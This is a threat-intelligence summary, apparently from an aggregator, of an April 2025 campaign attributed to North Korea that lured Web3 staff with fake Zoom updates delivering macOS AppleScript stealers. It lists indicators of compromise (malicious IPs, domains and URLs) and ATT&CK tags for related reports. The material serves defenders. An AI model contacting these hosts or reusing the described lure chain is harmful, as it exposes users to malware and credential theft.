North Korea Calling - Web3 Zoom Campaign

2025-04-23 Huntabil

https://huntability.tech/threat-note-2025-04-23-nk-zoom/

Thumbnail for North Korea Calling - Web3 Zoom Campaign

Huntabil.IT describes an April 2025 incident response case that exposed a likely North Korea directed campaign against Web3 and crypto organizations. The operators impersonated a trusted Telegram contact, pushed the target through Calendly to a fake Zoom SDK update, and delivered AppleScript from a typosquatted support.us05web-zoom domain tailored for macOS victims. The script called C2 with host and process details, dropped Mach-O persistence components under ~/Library/DnsService, and pulled data theft scripts that collected browser, shell, and Telegram data. Huntabil.IT assessed the activity as targeted reconnaissance and initial data theft aimed at people involved in treasury operations, with infrastructure appearing shortly before the attack.

Indicators of Compromise

Type Value First Seen Last Seen
IPv4 192.119.116.231 2025-04-23 2025-12-17
IPv4 104.168.151.116 2025-04-23 2025-12-17
IPv4 192.236.146.22 2025-04-23 2025-12-17
URL https://writeup.live/test 2025-04-23 2025-10-28
URL https://safeup.store/test 2025-04-23 2025-10-28
DOMAIN safeup.store 2025-04-23 2025-10-28
DOMAIN dataupload.store 2025-04-23 2025-10-28
DOMAIN writeup.live 2025-04-23 2025-10-28
HASH 41660a23e5db77597994e17f9f773d0… 2025-04-23 2025-07-14
HASH 469fd8a280e89a6edd0d704d0be4c7e… 2025-04-23 2025-07-14
IPv4 23.254.247.53 2025-04-23 2025-06-20
HASH 803d5db6296a5829b168ae45087356f… 2025-04-23 2025-04-23
HASH 5fe5b1d879251d1618e275099cc6363… 2025-04-23 2025-04-23
URL https://dataupload.store/ 2025-04-23 2025-04-23
URL https://support.us05web-zoom.pr… 2025-04-23 2025-04-23
DOMAIN support.us05web-zoom.pro 2025-04-23 2025-04-23
IPv4 192.236.198.31 2025-04-23 2025-04-23
IPv4 142.11.241.62 2025-04-23 2025-04-23

Related Reports

2025-02-12 • 35% Match
#APT43 #T1102.002 #T1082 #T1059.003 #T1567.002 #T1140 #T1005 #T1070.004 #T1587.001 #T1041 #T1608.001 #T1071.001 #T1112 #T1083 #T1056.001 #T1059.006 #T1204.001 #T1059.007 #T1036 #T1027 #T1204.002 #T1566.002 #T1555.003 #T1057 #T1059.005 #T1583.006 #T1518.001 #T1566.001 #T1547.001 #T1585.002 #T1053.005 #T1598.003 #T1583.001 #T1059.001 #T1036.005 #T1552.001 #T1585.001 #T1105 #T1219 #T1055 #T1553.002 #T1562.001 #T1027.002 #T1133 #T1190 #T1098 #T1016 #T1074.001 #T1588.002 #T1055.012 #T1587 #T1078.003 #T1071.002 #T1562.004 #T1550.002 #T1111 #T1071.003 #T1591 #T1003.001 #T1218.011 #T1593.002 #T1586.002 #T1588.005 #T1583.004 #T1036.004 #T1589.003 #T1594 #T1218.010 #T1557 #T1593.001 #T1218.005 #T1589.002 #T1584.001 #T1070.006 #T1021.001 #T1560.001 #T1176 #T1136.001 #T1543.003 #T1012 #T1534 #T1560.003 #T1007 #T1564.003 #T1114.003 #T1114.002 #T1564.002 #T1040 #T1546.001 #T1505.003
Shares tags: T1082, T1005, T1041
2024-07-19 • 32% Match
#Trend #Andariel #Kimsuky #MoonstoneSleet #Lazarus #T1082 #T1059.003 #T1090 #T1140 #T1005 #T1070.004 #T1041 #T1113 #T1555 #T1560 #T1071.001 #T1046 #T1112 #T1115 #T1083 #T1497 #T1056.001 #T1036 #T1027 #T1204.002 #T1566.002 #T1555.003 #T1071 #T1124 #T1222 #T1552 #T1057 #T1583.003 #T1518.001 #T1547.001 #T1053.005 #T1539 #T1608.005 #T1583.001 #T1059.001 #T1053 #T1552.001 #T1566 #T1059 #T1003 #T1497.001 #T1102.001 #T1574.002 #T1562.001 #T1490 #T1486 #T1129 #T1133 #T1571 #T1548 #T1190 #T1203 #T1564.001 #T1087 #T1562.004 #T1218.011 #T1070.006 #T1547 #T1068 #T1614 #T1573 #T1095 #T1562 #T1070 #T1047 #T1056 #T1176 #T1010 #T1033 #T1569.002 #T1543.003 #T1485 #T1012 #T1202 #T1087.002 #T1021.004 #T1222.001 #T1518 #T1564.003 #T1505.003 #T1069.002 #T1564 #T1595.002 #T1027.005 #T1070.001 #T1056.004 #T1584
Shares tags: T1082, T1005, T1041
« Back